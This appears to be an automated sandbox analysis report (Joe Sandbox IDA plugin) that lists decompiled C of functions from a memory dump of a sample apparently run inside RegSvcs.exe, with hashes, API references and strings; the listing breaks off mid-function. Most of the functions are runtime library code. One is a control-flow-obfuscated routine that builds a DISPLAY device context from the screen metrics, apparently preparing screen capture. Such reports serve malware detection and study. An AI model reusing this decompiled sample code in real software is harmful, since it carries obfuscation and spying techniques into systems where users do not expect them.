0x0044a1fc
0x0044a1fc

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb47b257d81ad07a6bf087e59fe8e4b521cfb3cdfb19623f86b6810e04ca4e2
Instruction ID: 0bea0a203263388e4520a83fd7018bc9f3df5f341d284194c7b2b644fbd20699
Opcode Fuzzy Hash: 3fb47b257d81ad07a6bf087e59fe8e4b521cfb3cdfb19623f86b6810e04ca4e2
Instruction Fuzzy Hash: 1EB13970E40245AFFF11CF99C881BAEBBB1AF49304F14415BE901A7392D7799D42CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0043D2E1 Relevance: 9.3, APIs: 6, Instructions: 269
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0043D2E1(void* __ebx, void* __edx, void* __edi, void* __esi, void* _a4) {
				char _v12;
				void _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v52;
				void* __ebp;
				signed int _t62;
				void* _t65;
				void _t68;
				void _t72;
				void _t74;
				void _t76;
				intOrPtr _t78;
				void _t79;
				void* _t80;
				void _t82;
				void* _t83;
				void _t85;
				void _t91;
				void _t100;
				void _t104;
				void* _t107;
				void* _t108;
				void* _t110;
				intOrPtr _t114;
				void _t116;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				void* _t128;
				void _t131;
				void* _t139;
				void _t141;
				intOrPtr _t144;
				void _t149;
				void _t151;
				void* _t152;
				void* _t154;
				void* _t156;
				void* _t158;
				void _t160;
				void _t161;
				void _t162;
				void* _t164;
				void* _t166;

				_t139 = __edx;
				_pop(_t163);
				_t164 = _t166;
				_push(__esi);
				_t158 = _a4;
				if(_t158 != 0) {
					_push(__edi);
					_t121 = 9;
					memset(_t158, _t62 | 0xffffffff, _t121 << 2);
					_t149 = _a4;
					__eflags = _t149;
					if(_t149 != 0) {
						_push(__ebx);
						__eflags =  *(_t149 + 4);
						if(__eflags > 0) {
							L8:
							_t65 = 7;
							__eflags =  *(_t149 + 4) - _t65;
							if(__eflags < 0) {
								L15:
								E0044AF6E(0, _t139, _t149, _t158, __eflags);
								_v16 = 0;
								_v20 = 0;
								_v12 = 0;
								_t68 = E0044ABD1( &_v16);
								__eflags = _t68;
								if(_t68 != 0) {
									L48:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E004457C7();
									asm("int3");
									_push(_t164);
									return E0043D58E(0, _t139, _t149, _v52, 1);
								} else {
									_t72 = E0044ABFD( &_v20);
									__eflags = _t72;
									if(_t72 != 0) {
										goto L48;
									} else {
										_t74 = E0044AC29( &_v12);
										__eflags = _t74;
										if(_t74 != 0) {
											goto L48;
										} else {
											_t128 =  *_t149;
											_t12 = _t149 + 4; // 0x310a74c0
											_t114 =  *_t12;
											_t141 = _t128 + 0xfffc0b7f;
											asm("adc eax, 0xffffffff");
											__eflags = _t114 - 7;
											if(__eflags > 0) {
												L26:
												_push(_t149);
												_push(_t158);
												_t76 = E0044AC90();
												__eflags = _t76;
												if(_t76 != 0) {
													goto L12;
												} else {
													__eflags = _v16;
													asm("cdq");
													_t151 =  *_t158;
													_t116 = _t141;
													if(__eflags == 0) {
														L30:
														_t78 = _v12;
													} else {
														_push(_t158);
														_t100 = E0044AF1A(_t116, _t151, _t158, __eflags);
														__eflags = _t100;
														if(_t100 == 0) {
															goto L30;
														} else {
															_t78 = _v12 + _v20;
															 *((intOrPtr*)(_t158 + 0x20)) = 1;
														}
													}
													asm("cdq");
													_t152 = _t151 - _t78;
													asm("sbb ebx, edx");
													_t79 = E0044B890(_t152, _t116, 0x3c, 0);
													 *_t158 = _t79;
													__eflags = _t79;
													if(_t79 < 0) {
														_t152 = _t152 + 0xffffffc4;
														 *_t158 = _t79 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t80 = E00449CA0(_t152, _t116, 0x3c, 0);
													_t117 = _t141;
													asm("cdq");
													_t154 = _t80 +  *(_t158 + 4);
													asm("adc ebx, edx");
													_t82 = E0044B890(_t154, _t141, 0x3c, 0);
													 *(_t158 + 4) = _t82;
													__eflags = _t82;
													if(_t82 < 0) {
														_t154 = _t154 + 0xffffffc4;
														 *(_t158 + 4) = _t82 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t83 = E00449CA0(_t154, _t117, 0x3c, 0);
													_t118 = _t141;
													asm("cdq");
													_t156 = _t83 +  *(_t158 + 8);
													asm("adc ebx, edx");
													_t85 = E0044B890(_t156, _t141, 0x18, 0);
													 *(_t158 + 8) = _t85;
													__eflags = _t85;
													if(_t85 < 0) {
														_t156 = _t156 + 0xffffffe8;
														 *(_t158 + 8) = _t85 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t131 = E00449CA0(_t156, _t118, 0x18, 0);
													__eflags = _t141;
													if(__eflags < 0) {
														L44:
														 *(_t158 + 0xc) =  *(_t158 + 0xc) + _t131;
														asm("cdq");
														_t119 = 7;
														_t91 =  *(_t158 + 0xc);
														 *(_t158 + 0x18) = ( *(_t158 + 0x18) + 7 + _t131) % _t119;
														_t144 =  *((intOrPtr*)(_t158 + 0x1c)) + _t131;
														__eflags = _t91;
														if(_t91 > 0) {
															 *((intOrPtr*)(_t158 + 0x1c)) = _t144;
														} else {
															 *((intOrPtr*)(_t158 + 0x10)) = 0xb;
															 *((intOrPtr*)(_t158 + 0x14)) =  *((intOrPtr*)(_t158 + 0x14)) - 1;
															 *(_t158 + 0xc) = _t91 + 0x1f;
															 *((intOrPtr*)(_t158 + 0x1c)) = _t144 + 0x16d;
														}
													} else {
														if(__eflags > 0) {
															L40:
															 *(_t158 + 0xc) =  *(_t158 + 0xc) + _t131;
															asm("cdq");
															_t120 = 7;
															 *((intOrPtr*)(_t158 + 0x1c)) =  *((intOrPtr*)(_t158 + 0x1c)) + _t131;
															 *(_t158 + 0x18) = ( *(_t158 + 0x18) + _t131) % _t120;
														} else {
															__eflags = _t131;
															if(_t131 == 0) {
																__eflags = _t141;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L44;
																	} else {
																		__eflags = _t131;
																		if(_t131 < 0) {
																			goto L44;
																		}
																	}
																}
															} else {
																goto L40;
															}
														}
													}
													goto L47;
												}
											} else {
												if(__eflags < 0) {
													L21:
													asm("cdq");
													_push( &_v28);
													asm("sbb ebx, edx");
													_v28 = _t128 - _v12;
													_push(_t158);
													_v24 = _t114;
													_t76 = E0044AC90();
													__eflags = _t76;
													if(_t76 != 0) {
														goto L12;
													} else {
														__eflags = _v16 - _t76;
														if(__eflags == 0) {
															L47:
															_t76 = 0;
															goto L12;
														} else {
															_push(_t158);
															_t104 = E0044AF1A(_t114, _t149, _t158, __eflags);
															__eflags = _t104;
															if(_t104 == 0) {
																goto L47;
															} else {
																asm("cdq");
																_v28 = _v28 - _v20;
																_push( &_v28);
																asm("sbb [ebp-0x10], edx");
																_push(_t158);
																_t76 = E0044AC90();
																__eflags = _t76;
																if(_t76 != 0) {
																	goto L12;
																} else {
																	 *((intOrPtr*)(_t158 + 0x20)) = 1;
																	goto L47;
																}
															}
														}
													}
												} else {
													__eflags = _t141 - 0x935041fd;
													if(_t141 > 0x935041fd) {
														goto L26;
													} else {
														goto L21;
													}
												}
											}
											goto L14;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L11;
								} else {
									__eflags =  *_t149 - 0x93582aff;
									if(__eflags <= 0) {
										goto L15;
									} else {
										goto L11;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L11:
								_t107 = E0043C326();
								_t160 = 0x16;
								 *_t107 = _t160;
								_t76 = _t160;
								L12:
								goto L13;
							} else {
								__eflags =  *_t149;
								if( *_t149 < 0) {
									goto L11;
								} else {
									goto L8;
								}
							}
						}
					} else {
						_t108 = E0043C326();
						_t161 = 0x16;
						 *_t108 = _t161;
						E004457B7();
						_t76 = _t161;
						L13:
						goto L14;
					}
				} else {
					_t110 = E0043C326();
					_t162 = 0x16;
					 *_t110 = _t162;
					E004457B7();
					_t76 = _t162;
					L14:
					return _t76;
				}
			}

0x0043d2e1
0x0043d2e6
0x0043d2ef
0x0043d2f4
0x0043d2f5
0x0043d2fa
0x0043d30f
0x0043d317
0x0043d318
0x0043d31a
0x0043d31d
0x0043d31f
0x0043d334
0x0043d337
0x0043d33a
0x0043d342
0x0043d344
0x0043d345
0x0043d348
0x0043d365
0x0043d365
0x0043d36d
0x0043d371
0x0043d374
0x0043d377
0x0043d37d
0x0043d37f
0x0043d570
0x0043d570
0x0043d571
0x0043d572
0x0043d573
0x0043d574
0x0043d575
0x0043d57a
0x0043d57d
0x0043d58d
0x0043d385
0x0043d389
0x0043d38f
0x0043d391
0x00000000
0x0043d397
0x0043d39b
0x0043d3a1
0x0043d3a3
0x00000000
0x0043d3a9
0x0043d3a9
0x0043d3ad
0x0043d3ad
0x0043d3b0
0x0043d3b8
0x0043d3bb
0x0043d3be
0x0043d42e
0x0043d42e
0x0043d42f
0x0043d430
0x0043d437
0x0043d439
0x00000000
0x0043d43f
0x0043d43f
0x0043d445
0x0043d446
0x0043d448
0x0043d44a
0x0043d466
0x0043d466
0x0043d44c
0x0043d44c
0x0043d44d
0x0043d453
0x0043d455
0x00000000
0x0043d457
0x0043d45a
0x0043d45d
0x0043d45d
0x0043d455
0x0043d469
0x0043d46a
0x0043d470
0x0043d474
0x0043d479
0x0043d47b
0x0043d47d
0x0043d482
0x0043d485
0x0043d487
0x0043d487
0x0043d490
0x0043d497
0x0043d49c
0x0043d49d
0x0043d4a3
0x0043d4a7
0x0043d4ac
0x0043d4af
0x0043d4b1
0x0043d4b6
0x0043d4b9
0x0043d4bc
0x0043d4bc
0x0043d4c5
0x0043d4cc
0x0043d4d1
0x0043d4d2
0x0043d4d8
0x0043d4dc
0x0043d4e1
0x0043d4e4
0x0043d4e6
0x0043d4eb
0x0043d4ee
0x0043d4f1
0x0043d4f1
0x0043d4ff
0x0043d501
0x0043d503
0x0043d52b
0x0043d531
0x0043d538
0x0043d539
0x0043d53c
0x0043d53f
0x0043d545
0x0043d547
0x0043d549
0x0043d566
0x0043d54b
0x0043d54e
0x0043d555
0x0043d558
0x0043d561
0x0043d561
0x0043d505
0x0043d505
0x0043d50b
0x0043d510
0x0043d515
0x0043d516
0x0043d519
0x0043d51c
0x0043d507
0x0043d507
0x0043d509
0x0043d521
0x0043d523
0x0043d525
0x00000000
0x0043d527
0x0043d527
0x0043d529
0x00000000
0x00000000
0x0043d529
0x0043d525
0x00000000
0x00000000
0x00000000
0x0043d509
0x0043d505
0x00000000
0x0043d503
0x0043d3c0
0x0043d3c0
0x0043d3ca
0x0043d3cd
0x0043d3d3
0x0043d3d4
0x0043d3d6
0x0043d3d9
0x0043d3da
0x0043d3dd
0x0043d3e4
0x0043d3e6
0x00000000
0x0043d3ec
0x0043d3ec
0x0043d3ef
0x0043d569
0x0043d569
0x00000000
0x0043d3f5
0x0043d3f5
0x0043d3f6
0x0043d3fc
0x0043d3fe
0x00000000
0x0043d404
0x0043d407
0x0043d408
0x0043d40e
0x0043d40f
0x0043d412
0x0043d413
0x0043d41a
0x0043d41c
0x00000000
0x0043d422
0x0043d422
0x00000000
0x0043d422
0x0043d41c
0x0043d3fe
0x0043d3ef
0x0043d3c2
0x0043d3c2
0x0043d3c8
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d3c8
0x0043d3c0
0x00000000
0x0043d3be
0x0043d3a3
0x0043d391
0x0043d34a
0x0043d34a
0x00000000
0x0043d34c
0x0043d34c
0x0043d352
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d352
0x0043d34a
0x0043d33c
0x0043d33c
0x0043d354
0x0043d354
0x0043d35b
0x0043d35c
0x0043d35e
0x0043d360
0x00000000
0x0043d33e
0x0043d33e
0x0043d340
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d340
0x0043d33c
0x0043d321
0x0043d321
0x0043d328
0x0043d329
0x0043d32b
0x0043d330
0x0043d361
0x00000000
0x0043d361
0x0043d2fc
0x0043d2fc
0x0043d303
0x0043d304
0x0043d306
0x0043d30b
0x0043d362
0x0043d364
0x0043d364

APIs

__allrem.LIBCMT ref: 0043D474
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043D490
__allrem.LIBCMT ref: 0043D4A7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043D4C5
__allrem.LIBCMT ref: 0043D4DC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043D4FA

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 79c9f0adca6988d39eaef1d462472db2a57ded08e5074776f613912a4e7a64ae
Instruction ID: ae14b8a1c4c0420c86196e796cc961de6b21bba00a1a55efb98d5f255ac9daa4
Opcode Fuzzy Hash: 79c9f0adca6988d39eaef1d462472db2a57ded08e5074776f613912a4e7a64ae
Instruction Fuzzy Hash: CC81F672E00706ABE7209E29DC81B5BB3E9AF48768F14552FF411D7381E778ED048B59

Uniqueness

Uniqueness Score: -1.00%

Function 00443C94 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00443C94(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x460144 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0044E101(_t13,  *0x460144);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E0044E13C(_t14,  *0x460144, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0043EBC9();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E0044E13C(_t18,  *0x460144, 0);
								} else {
									_t8 = E0044E13C(_t18,  *0x460144, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0043F602(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00443c94
0x00443c9b
0x00443cae
0x00443cb5
0x00443cb7
0x00443cbb
0x00443cd4
0x00443cd4
0x00443cbd
0x00443cbf
0x00443cd2
0x00443cd9
0x00443ce2
0x00443ce5
0x00443ce8
0x00443cfc
0x00443cfc
0x00443d05
0x00443cea
0x00443cf1
0x00443cf7
0x00443cfa
0x00443d0e
0x00443d10
0x00000000
0x00000000
0x00000000
0x00443cfa
0x00443d13
0x00000000
0x00000000
0x00000000
0x00443cd2
0x00443cbf
0x00443d1b
0x00443d25
0x00443c9d
0x00443c9f
0x00443c9f

APIs

GetLastError.KERNEL32(?,?,00443C8B,00431E66,004319B7), ref: 00443CA2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00443CB0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00443CC9
SetLastError.KERNEL32(00000000,00443C8B,00431E66,004319B7), ref: 00443D1B

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 024f849b92edafa81db55e2c2c90d3fe67313a9b0e06d362bc07a6d92e4e1220
Instruction ID: 5abb9f32f5407bc065f677eccee935473730ebea7b739acd8b8b573d2f31dc9a
Opcode Fuzzy Hash: 024f849b92edafa81db55e2c2c90d3fe67313a9b0e06d362bc07a6d92e4e1220
Instruction Fuzzy Hash: 7201D4326093225FB7242F76BC865676A54EB02B7BB30023FF514552F2EEAA4D01915D

Uniqueness

Uniqueness Score: -1.00%

Function 00427DBB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00427DBB() {
				void* _v16;
				WCHAR* _v20;
				int _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				WCHAR* _t19;
				intOrPtr* _t20;
				struct HDC__* _t22;
				void* _t23;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				char _t30;
				char _t31;
				WCHAR* _t32;
				int _t34;
				void* _t36;
				WCHAR* _t37;

				_t37 = _t36 - 0x10;
				_v32 = 0xb503debc;
				_t27 = 0xb503debc;
				_t32 = _v28;
				_t34 = _v24;
				L1:
				while(_t27 > 0xc4b3e928) {
					if(_t27 <= 0x577acf0f) {
						if(_t27 != 0x46bc6480) {
							if(_t27 != 0xc4b3e929) {
								continue;
							}
							_v32 = _t27;
							_v28 = _t32;
							_v24 = _t34;
							_t20 = _v20;
							_t28 =  *0x457746; // 0x59
							 *((intOrPtr*)(_t20 + 0xc)) = _t28;
							_t29 =  *0x457742; // 0x41004c
							 *((intOrPtr*)(_t20 + 8)) = _t29;
							_t30 = L"SPLAY"; // 0x500053
							 *((intOrPtr*)(_t20 + 4)) = _t30;
							_t31 = L"DISPLAY"; // 0x490044
							 *_t20 = _t31;
							_t22 = CreateDCW(_v20, 0, 0, 0);
							_push(_v28);
							_push(_v24);
							_push(_t22);
							_t23 = E00427ACE();
							DeleteDC(_t22);
							return _t23;
						}
						_t19 = _v20;
						_t27 = 0x577acf10;
					} else {
						if(_t27 == 0x577acf10) {
							_t27 = 0xc4b3e929;
						} else {
							if(_t27 == 0x7b6e7a9b) {
								_t27 = 0x99ed4e33;
							}
						}
					}
				}
				if(_t27 == 0x97cd0040) {
					_t27 = 0x7b6e7a9b;
					_t34 = GetSystemMetrics(0);
				} else {
					if(_t27 == 0x99ed4e33) {
						_t27 = 0x46bc6480;
						_t19 = GetSystemMetrics(1);
						_t32 = _t19;
					} else {
						if(_t27 == 0xb503debc) {
							_push(_t19);
							_t37 = _t37 - 0xc;
							_t19 = _t37;
							_v20 = _t19;
							_t27 = 0x97cd0040;
						}
					}
				}
				goto L1;
			}

0x00427dc1
0x00427dc4
0x00427dcb
0x00427dd0
0x00427dd3
0x00000000
0x00427dd6
0x00427de4
0x00427e2b
0x00427e69
0x00000000
0x00000000
0x00427e6f
0x00427e72
0x00427e75
0x00427e78
0x00427e7b
0x00427e81
0x00427e84
0x00427e8a
0x00427e8d
0x00427e93
0x00427e96
0x00427e9c
0x00427ea6
0x00427eae
0x00427eb1
0x00427eb4
0x00427eb5
0x00427ec0
0x00427ed2
0x00427ed2
0x00427e2d
0x00427e30
0x00427de6
0x00427dec
0x00427e37
0x00427dee
0x00427df4
0x00427df6
0x00427df6
0x00427df4
0x00427dec
0x00427de4
0x00427e03
0x00427e3e
0x00427e4b
0x00427e05
0x00427e0b
0x00427e4f
0x00427e56
0x00427e5c
0x00427e0d
0x00427e13
0x00427e15
0x00427e16
0x00427e19
0x00427e1b
0x00427e1e
0x00427e1e
0x00427e13
0x00427e0b
0x00000000

APIs

GetSystemMetrics.USER32 ref: 00427E45
GetSystemMetrics.USER32 ref: 00427E56
CreateDCW.GDI32(?,00000000,00000000,00000000), ref: 00427EA6
DeleteDC.GDI32(00000000), ref: 00427EC0

Strings

DISPLAY, xrefs: 00427E96

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: MetricsSystem$CreateDelete
String ID: DISPLAY
API String ID: 1043530637-865373369
Opcode ID: ed8cd9db5dcf2e9879384cc29fd113dca164dcdca27f6947ef9034b5687e0145
Instruction ID: b9680aaecab4e38fdb9f31cb099caeb932f679b35c35631d5bd9ff71a7371b0e
Opcode Fuzzy Hash: ed8cd9db5dcf2e9879384cc29fd113dca164dcdca27f6947ef9034b5687e0145
Instruction Fuzzy Hash: F631B476F08329AF9B109F54B89587EB775FF1C351B54402BE904E7352D279AC008BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0043E46D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043E46D(signed int _a4, intOrPtr _a8) {
				signed int _t6;
				void* _t14;
				void* _t19;
				intOrPtr _t31;
				signed int _t33;
				unsigned int _t38;

				_t33 = _a4;
				_t31 = _a8;
				if((_t33 >> 0x00000004 & 0x00000001) != 0) {
					L2:
					_t6 = 0x4140;
					L3:
					_t38 = ( !(_t33 << 7) & 0x00000080 | _t6) & 0x0000ffff;
					if(_t31 != 0) {
						_t14 = E0043489B(_t31, 0x2e);
						_t32 = _t14;
						if(_t14 != 0 && (E0044D332(_t32, L".exe") == 0 || E0044D332(_t32, L".cmd") == 0 || E0044D332(_t32, L".bat") == 0 || E0044D332(_t32, L".com") == 0)) {
							_t38 = _t38 | 0x00000040;
						}
					}
					return (_t38 | _t38 >> 0x00000003 & 0x00000038) >> 0x00000006 & 0x00000007 | _t38 | _t38 >> 0x00000003 & 0x00000038;
				}
				_t19 = E0043E417(_t31);
				_t6 = 0x8100;
				if(_t19 == 0) {
					goto L3;
				}
				goto L2;
			}

0x0043e473
0x0043e47c
0x0043e481
0x0043e493
0x0043e493
0x0043e498
0x0043e4a5
0x0043e4aa
0x0043e4af
0x0043e4b4
0x0043e4ba
0x0043e500
0x0043e500
0x0043e4ba
0x0043e51a
0x0043e51a
0x0043e484
0x0043e48b
0x0043e491
0x00000000
0x00000000
0x00000000

APIs

_wcsrchr.LIBVCRUNTIME ref: 0043E4AF

Strings

.bat, xrefs: 0043E4DE
.cmd, xrefs: 0043E4CD
.com, xrefs: 0043E4EF
.exe, xrefs: 0043E4BC

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: a43594e21cf206e5246371cccfd166fd407d03b2e719c0c799ef29a850053100
Instruction ID: 6027f806e20d99d9d715d254ba0e090cf09196ca9ff262dc9d27ecf5d53a08c0
Opcode Fuzzy Hash: a43594e21cf206e5246371cccfd166fd407d03b2e719c0c799ef29a850053100
Instruction Fuzzy Hash: A301DB3BA45625316A14945FEC0276717989B9ABB8B35502FFC44F72C1FD5CED03019D

Uniqueness

Uniqueness Score: -1.00%

Function 0043B498 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E0043B498(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x460120; // 0x5959051
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x454b76, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x45d9f4(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x0043b4ad
0x0043b4b8
0x0043b4be
0x0043b4c2
0x0043b4cd
0x0043b4d5
0x0043b4df
0x0043b4e5
0x0043b4e9
0x0043b4f0
0x0043b4f6
0x0043b4f6
0x0043b4e9
0x0043b4fc
0x0043b501
0x0043b501
0x0043b50a
0x0043b514

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,05959051,?,?,00000000,00454B76,000000FF,?,0043B562,0043B3FD,?,0043B61D,00000000), ref: 0043B4CD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043B4DF
FreeLibrary.KERNEL32(00000000,?,?,00000000,00454B76,000000FF,?,0043B562,0043B3FD,?,0043B61D,00000000), ref: 0043B501

Strings

mscoree.dll, xrefs: 0043B4C6
CorExitProcess, xrefs: 0043B4D7

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fc35f45d10fd2372918c6186552d04188de940a6ffa9a6b480e48498a9042434
Instruction ID: ba8c768a3aeebabbbaaa3e88dce22a5b5938fdda1f851172f1b56136d50c69f6
Opcode Fuzzy Hash: fc35f45d10fd2372918c6186552d04188de940a6ffa9a6b480e48498a9042434
Instruction Fuzzy Hash: E3016272944719EBDB119F54DC05FAEBBB8FF48B16F004636E811A22E1DB789904CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0043DDBF Relevance: 7.6, APIs: 5, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0043DDBF(void* __ebx, unsigned int __edx, unsigned int _a4, signed int _a8) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				intOrPtr _v40;
				intOrPtr _v44;
				short _v48;
				short _v52;
				short _v56;
				void* _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				struct _SYSTEMTIME _v92;
				struct _FILETIME _v100;
				struct _FILETIME _v108;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t59;
				intOrPtr _t64;
				signed int _t67;
				signed int _t78;
				int _t81;
				signed int _t83;
				signed int _t94;
				int _t97;
				int _t101;
				void* _t105;
				signed int _t108;
				signed int _t118;
				unsigned int _t119;
				signed int _t120;

				_t116 = __edx;
				_t105 = __ebx;
				_t56 =  *0x460120; // 0x5959051
				_v8 = _t56 ^ _t120;
				_t119 = _a4;
				_t118 = _a8;
				if(_t119 != 0xfffffffe) {
					__eflags = _t119;
					if(_t119 < 0) {
						L16:
						 *((intOrPtr*)(E0043C326())) = 9;
						_t59 = E004457B7();
						goto L17;
					} else {
						__eflags = _t119 -  *0x461770; // 0x40
						if(__eflags >= 0) {
							goto L16;
						} else {
							_t116 = _t119 >> 6;
							_t108 = (_t119 & 0x0000003f) * 0x38;
							_t64 =  *((intOrPtr*)(0x461570 + (_t119 >> 6) * 4));
							__eflags =  *(_t64 + _t108 + 0x28) & 0x00000001;
							if(( *(_t64 + _t108 + 0x28) & 0x00000001) == 0) {
								goto L16;
							} else {
								__eflags = _t118;
								if(_t118 == 0) {
									E0043DCD1(_t108, _t116,  &_v68);
									_t118 =  &_v76;
									_v76 = _v68;
									_v72 = _v64;
								}
								_push(_t118 + 8);
								_push( &_v60);
								_t67 = E0043D2E1(_t105, _t116, _t118, _t119);
								__eflags = _t67;
								if(_t67 == 0) {
									_v24 = _v40 + 0x76c;
									_v22 = _v44 + 1;
									_v18 = _v48;
									_v16 = _v52;
									_v14 = _v56;
									_v12 = _v60;
									_v10 = 0;
									_t78 =  &_v24;
									__imp__TzSpecificLocalTimeToSystemTime(0, _t78,  &_v92);
									__eflags = _t78;
									if(_t78 == 0) {
										goto L8;
									} else {
										_t81 = SystemTimeToFileTime( &_v92,  &_v100);
										__eflags = _t81;
										if(_t81 == 0) {
											goto L8;
										} else {
											_push(_t118);
											_push( &_v60);
											_t83 = E0043D2E1(_t105, _t116, _t118, _t119);
											__eflags = _t83;
											if(_t83 != 0) {
												goto L8;
											} else {
												_v24 = _v40 + 0x76c;
												_v22 = _v44 + 1;
												_v18 = _v48;
												_v16 = _v52;
												_v14 = _v56;
												_v12 = _v60;
												_v10 = 0;
												_t94 =  &_v24;
												__imp__TzSpecificLocalTimeToSystemTime(0, _t94,  &_v92);
												__eflags = _t94;
												if(_t94 == 0) {
													goto L8;
												} else {
													_t97 = SystemTimeToFileTime( &_v92,  &_v108);
													__eflags = _t97;
													if(_t97 == 0) {
														goto L8;
													} else {
														_t101 = SetFileTime(E004473BC(_t119), 0,  &_v108,  &_v100);
														__eflags = _t101;
														if(_t101 == 0) {
															goto L8;
														} else {
															_t60 = 0;
														}
													}
												}
											}
										}
									}
								} else {
									L8:
									_t59 = E0043C326();
									 *_t59 = 0x16;
									goto L17;
								}
							}
						}
					}
				} else {
					_t59 = E0043C326();
					 *_t59 = 9;
					L17:
					_t60 = _t59 | 0xffffffff;
				}
				return E00431C58(_t60, _t105, _v8 ^ _t120, _t116, _t118, _t119);
			}

0x0043ddbf
0x0043ddbf
0x0043ddc7
0x0043ddce
0x0043ddd2
0x0043ddd6
0x0043dddc
0x0043ddee
0x0043ddf0
0x0043df5d
0x0043df62
0x0043df68
0x00000000
0x0043ddf6
0x0043ddf6
0x0043ddfc
0x00000000
0x0043de02
0x0043de09
0x0043de0c
0x0043de0f
0x0043de16
0x0043de1b
0x00000000
0x0043de21
0x0043de21
0x0043de23
0x0043de29
0x0043de31
0x0043de38
0x0043de3b
0x0043de3b
0x0043de41
0x0043de45
0x0043de46
